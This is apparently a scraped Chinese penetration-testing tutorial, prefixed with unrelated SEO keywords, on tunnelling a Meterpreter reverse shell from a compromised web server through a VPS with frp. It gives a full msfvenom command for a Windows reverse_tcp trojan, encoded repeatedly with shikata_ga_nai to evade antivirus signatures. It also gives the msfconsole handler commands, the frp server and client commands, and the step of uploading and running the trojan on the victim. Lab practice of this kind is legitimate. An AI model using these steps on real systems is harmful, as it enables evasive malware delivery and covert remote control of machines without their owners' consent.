网站后台管理增加功能,彩票网站开发亿云,php在线做网站,重庆网站设计公司推荐文章目录 代理代理使用场景VPS建立隧道frpMSF木马生成监听开启frp服务端和客户端执行exe木马文件 代理
实验环境#xff1a; 攻击机kali#xff1a;192.168.188.133#xff08;NAT模式#xff09; 模拟的公网服务器#xff08;本机#xff09;#xff1a;10.9.75.239 … 文章目录 代理代理使用场景VPS建立隧道frpMSF木马生成监听开启frp服务端和客户端执行exe木马文件 代理
实验环境 攻击机kali192.168.188.133NAT模式 模拟的公网服务器本机10.9.75.239 失陷主机10.9.75.145桥接模式
代理使用场景
拿下远程的Web服务器。Webshell连接不稳定需要使用稳定的木马程序。远程服务器无法直接连接攻击者的电脑。需要借助公网的vps转发来在失陷服务器的木马流量。借助frp服务端vps和客户端内网攻击者建立隧道。当vps某个端口收到流量的时候frps会根据提前和frpc约定好的规则使用建立好的隧道转发流量到frpc。 前提条件 拿下了公网上的一台主机8.8.8.8的webshell的权限需要上传完整功能的木马文件。那么有一个问题木马执行了后要找谁此时的失陷主机是连接不到内网的攻击主机这个时候就需要用到代理技术。 VPS
VPS是Virtual Private Serve的英文缩写即虚拟专用服务器。VPS就是将一台物理服务器分割成多个独立的虚拟专项服务器每一个VPS都可以分配独立的公网IP地址独立的操作系统能够实现不同VPS的磁盘空间、CPU资源、内存、系统等配置的隔离通过虚拟技术让每一个用户使用VPS的时候都像是在使用一台独立服务器一样自定义安装自己需要的东西。
公网VPS 可以理解为服务器上的虚拟机攻击者可控。 攻击者和受害者服务器都可以访问到。
建立隧道 因为远程VPS不能访问攻击者的Kali主机。攻击者与远程VPS需要建立隧道远程VPS使用7000端口建立一个监听可以说隧道服务或者是代理服务这样远程VPS就能够访问攻击者主机。还需要将远程VPS的4444端口的流量通过7000端口发送给攻击者的Kali。代理的核心
给失陷Web服务器的木马内容 host当木马执行的时候去连接公网上的远程VPS。 post连接远程VPS的4444端口。
frp
frp可以实现端口转发端口监听隧道功能。frp分为客户端和服务端。 Kali上启动的是客户端frpc 本机上启动的是服务端frps frp运行起来的时候会自动的将7000端口开放当然该端口可以在配置文件中进行修改。这样客户端和服务端就可以连接上了他们之间就会有一个隧道。
远程VPS服务器的4444端口会主动转发数据流量给客户端的4444端口不做任何操作通过frp建立的隧道发送给远程连接的客户端的端口至于转发给客户端的哪个端口是由frpc的配置文件来决定的。
MSF木马生成
msfvenom -p windows/meterpreter/reverse_tcp LHOST10.9.75.239 LPORT4444 -e x86/shikata_ga_nai -f exe -o shell.exe -i 5命令解析 -p指定生成的Payload类型为Windows平台的Meterpreter反向TCP Shell。 LHOST10.9.75.239指定反向连接的目标IP地址这里是将连接的目标设置为10.9.75.239。这里就是将木马的数据流量信息发送给远程VPS服务器 LPORT4444指定反向连接的目标端口号这里是将连接的目标端口设置为4444。 -e x86/shikata_ga_nai对生成的Payload使用x86/shikata_ga_nai编码进行混淆以绕过一些基于特征签名的检测。 -f exe生成的Payload格式为可执行文件.exe。 -o shell.exe指定生成的Payload保存的文件名为shell.exe。 -i 5Payload的迭代次数表示对Payload进行重复编码的次数以增加混淆程度和绕过某些检测。 监听
使用msf进行监听
msfconsole载入监控模块
use exploit/multi/handler 加载payload
set payload windows/meterpreter/reverse_tcp
set lport 4444 # 监听本机的4444端口
set lhost 127.0.0.1 # 监听本机的IP地址也就是127.0.0.1
run查看Kali主机监听的端口号信息
ss -antpl命令的解析
ss是一个替代传统的netstat命令的工具用于显示套接字socket统计信息。-a显示所有的套接字连接包括监听中的和已建立的连接。-n以数值形式显示IP地址和端口号而不进行反向解析。-t只显示TCP协议相关的连接。-p显示每个连接所对应的进程ID和进程名称。-l只显示监听处于侦听状态的套接字连接。
开启frp服务端和客户端
注意先开启frp服务端再开启frp的客户端
开启frp服务端
.\frps.exe -c frps.ini说明-c表示指定服务端的配置文件。 开启frp客户端
将frp压缩包先进行一个解压操作。 修改frpc的配置文件。
vim frpc.ini当通过远程的frp服务器的7000端口连接好后下面的配置信息[msf]就生效了。
[msf]配置信息使用TCP协议进行通信当远程VPS的4444端口收到数据的时候会发送数据到kali本地地址的4444端口。
开启frp客户端
./frpc -c frpc.ini启动成功。
frp服务端情况 执行exe木马文件
将木马文件上传到失陷主机上双击执行即可。 kali攻击机成功监听。